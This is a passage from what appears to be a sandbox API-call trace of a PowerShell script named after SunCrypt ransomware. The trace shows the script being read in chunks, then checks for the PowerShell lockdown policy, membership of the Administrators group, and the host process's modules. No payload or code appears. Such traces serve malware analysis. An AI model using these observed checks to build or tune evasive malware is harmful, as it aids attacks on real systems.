lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x143000 [0081.294] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.294] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x144000 [0081.294] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.294] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x145000 [0081.294] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.294] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x146000 [0081.295] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.295] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x147000 [0081.295] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.295] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x148000 [0081.295] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.296] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x149000 [0081.296] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.297] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x14a000 [0081.297] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.297] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x14b000 [0081.297] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.297] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x14c000 [0081.297] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.298] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x14d000 [0081.298] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.298] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x14e000 [0081.298] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.299] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x14f000 [0081.299] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.300] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x150000 [0081.300] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.300] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x151000 [0081.300] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.301] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x152000 [0081.301] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.301] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x153000 [0081.301] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.301] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x154000 [0081.301] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.302] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x155000 [0081.302] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.302] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x156000 [0081.302] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.302] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x157000 [0081.302] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.303] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x158000 [0081.303] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.304] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x159000 [0081.304] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.305] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x15a000 [0081.305] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.305] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x15b000 [0081.305] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.305] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x15c000 [0081.306] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.306] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x15d000 [0081.306] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.306] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x15e000 [0081.306] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.307] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x15f000 [0081.307] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.308] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x160000 [0081.308] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.308] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x161000 [0081.308] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.309] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x162000 [0081.309] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.309] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x163000 [0081.309] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x66a, lpOverlapped=0x0) returned 1 [0081.310] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x16366a [0081.310] ReadFile (in: hFile=0x4bc, lpBuffer=0x1da9dca, nNumberOfBytesToRead=0x196, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1da9dca*, lpNumberOfBytesRead=0x4ebf208*=0x0, lpOverlapped=0x0) returned 1 [0081.310] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x16366a [0081.310] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x0, lpOverlapped=0x0) returned 1 [0081.360] NtQuerySystemInformation (in: SystemInformationClass=0xa4, SystemInformation=0x4ebf170, Length=0x20, ResultLength=0x4ebf1e0 | out: SystemInformation=0x4ebf170, ResultLength=0x4ebf1e0*=0x0) returned 0xc0000003 [0081.360] GetSystemInfo (in: lpSystemInfo=0x4ebf1ec | out: lpSystemInfo=0x4ebf1ec*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0081.360] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebf17c | out: phkResult=0x4ebf17c*=0x468) returned 0x0 [0081.360] RegQueryValueExW (in: hKey=0x468, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x4ebf198, lpData=0x0, lpcbData=0x4ebf194*=0x0 | out: lpType=0x4ebf198*=0x0, lpData=0x0, lpcbData=0x4ebf194*=0x0) returned 0x2 [0081.360] RegCloseKey (hKey=0x468) returned 0x0 [0081.361] CloseHandle (hObject=0x4bc) returned 1 [0081.384] CoCreateGuid (in: pguid=0x4ebeb80 | out: pguid=0x4ebeb80*(Data1=0xeafd3efa, Data2=0x55e2, Data3=0x4770, Data4=([0]=0xb4, [1]=0x1f, [2]=0xae, [3]=0x96, [4]=0x8b, [5]=0xd8, [6]=0xe2, [7]=0x55))) returned 0x0 [0082.901] CoCreateGuid (in: pguid=0x4ebf2b0 | out: pguid=0x4ebf2b0*(Data1=0x862ab76, Data2=0xd2c0, Data3=0x485e, Data4=([0]=0x89, [1]=0xfd, [2]=0x2a, [3]=0x3d, [4]=0x99, [5]=0xf4, [6]=0x2d, [7]=0xbf))) returned 0x0 [0082.919] GetCurrentProcess () returned 0xffffffff [0082.920] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4ebf27c | out: TokenHandle=0x4ebf27c*=0x4bc) returned 1 [0082.920] GetTokenInformation (in: TokenHandle=0x4bc, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4ebf27c | out: TokenInformation=0x0, ReturnLength=0x4ebf27c) returned 0 [0082.920] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4254698 [0082.920] GetTokenInformation (in: TokenHandle=0x4bc, TokenInformationClass=0x8, TokenInformation=0x4254698, TokenInformationLength=0x4, ReturnLength=0x4ebf27c | out: TokenInformation=0x4254698, ReturnLength=0x4ebf27c) returned 1 [0082.921] LocalFree (hMem=0x4254698) returned 0x0 [0082.921] DuplicateTokenEx (in: hExistingToken=0x4bc, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x4ebf284 | out: phNewToken=0x4ebf284*=0x468) returned 1 [0082.921] CheckTokenMembership (in: TokenHandle=0x468, SidToCheck=0x556e010*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x4ebf294 | out: IsMember=0x4ebf294) returned 1 [0082.921] CloseHandle (hObject=0x468) returned 1 [0082.932] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebf290 | out: lpPerformanceCount=0x4ebf290*=1640574855353) returned 1 [0082.932] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0082.932] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0082.932] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebef7c) returned 1 [0082.932] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebf240 | out: lpFileInformation=0x4ebf240*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0082.933] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebef78) returned 1 [0082.933] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0082.933] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0082.933] GetCurrentProcessId () returned 0xfac [0082.934] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xfac) returned 0x468 [0082.934] EnumProcessModules (in: hProcess=0x468, lphModule=0x556e518, cb=0x100, lpcbNeeded=0x4ebf188 | out: lphModule=0x556e518, lpcbNeeded=0x4ebf188) returned 1 [0082.935] EnumProcessModules (in: hProcess=0x468, lphModule=0x556e624, cb=0x200, lpcbNeeded=0x4ebf188 | out: lphModule=0x556e624, lpcbNeeded=0x4ebf188) returned 1 [0082.937] GetModuleInformation (in: hProcess=0x468, hModule=0xd80000, lpmodinfo=0x556e864, cb=0xc | out: lpmodinfo=0x556e864*(lpBaseOfDll=0xd80000, SizeOfImage=0x6b000, EntryPoint=0xd8d330)) returned 1 [0082.937] CoTaskMemAlloc (cb=0x804) returned 0x42669d8 [0082.938] GetModuleBaseNameW (in: hProcess=0x468, hModule=0xd80000, lpBaseName=0x42669d8, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0082.938] CoTaskMemFree (pv=0x42669d8) [0082.938] CoTaskMemAlloc (cb=0x804) returned 0x42669d8 [0082.938] GetModuleFileNameExW (in: hProcess=0x468, hModule=0xd80000, lpFilename=0x42669d8, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0082.938] CoTaskMemFree (pv=0x42669d8) [0082.938] CloseHandle (hObject=0x468) returned 1 [0082.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3a [0082.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x3a, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0082.938] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeec0) returned 1 [0082.938] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x4ebf184 | out: lpFileInformation=0x4ebf184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5ea9c30, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0xd5ea9c30, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x7711b3a3, ftLastWriteTime.dwHighDateTime=0x1d251bc, nFileSizeHigh=0x0, nFileSizeLow=0x68400)) returned 1 [0082.939] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeebc) returned 1 [0082.939] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpdwHandle=0x4ebf1f8 | out: lpdwHandle=0x4ebf1f8) returned 0x74c [0082.940] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwHandle=0x0, dwLen=0x74c, lpData=0x5570a54 | out: lpData=0x5570a54) returned 1 [0082.940] VerQueryValueW (in: pBlock=0x5570a54, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x4ebf1cc, puLen=0x4ebf1c8 | out: lplpBuffer=0x4ebf1cc*=0x5570df4, puLen=0x4ebf1c8) returned 1 [0082.940] VerQueryValueW (in: pBlock=0x5570a54, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\CompanyName", lplpBuffer=0x4ebf14c, puLen=0x4ebf148 | out: lplpBuffer=0x4ebf14c*=0x5570b0c, puLen=0x4ebf148) returned 1 [0082.940] VerQueryValueW (in: pBlock=0x5570a54, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileDescription", lplpBuffer=0x4ebf14c, puLen=0x4ebf148 | out: lplpBuffer=0x4ebf14c*=0x5570b60, puLen=0x4ebf148) returned 1 [0082.940] VerQueryValueW (in: pBlock=0x5570a54, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileVersion", lplpBuffer=0x4ebf14c, puLen=0x4ebf148 | out: lplpBuffer=0x4ebf14c*=0x5570ba8, puLen=0x4ebf148) returned 1 [0082.940] VerQueryValueW (in: pBlock=0x5570a54, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\InternalName", lplpBuffer=0x4ebf14c, puLen=0x4ebf148 | out: lplpBuffer=0x4ebf14c*=0x5570c1c, puLen=0x4ebf148) returned 1 [0082.940] VerQueryValueW (in: pBlock=0x5570a54, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalCopyright", lplpBuffer=0x4ebf14c, puLen=0x4ebf148 | out: lplpBuffer=0x4ebf14c*=0x5570c58, puLen=0x4ebf148) returned 1 [0082.940] 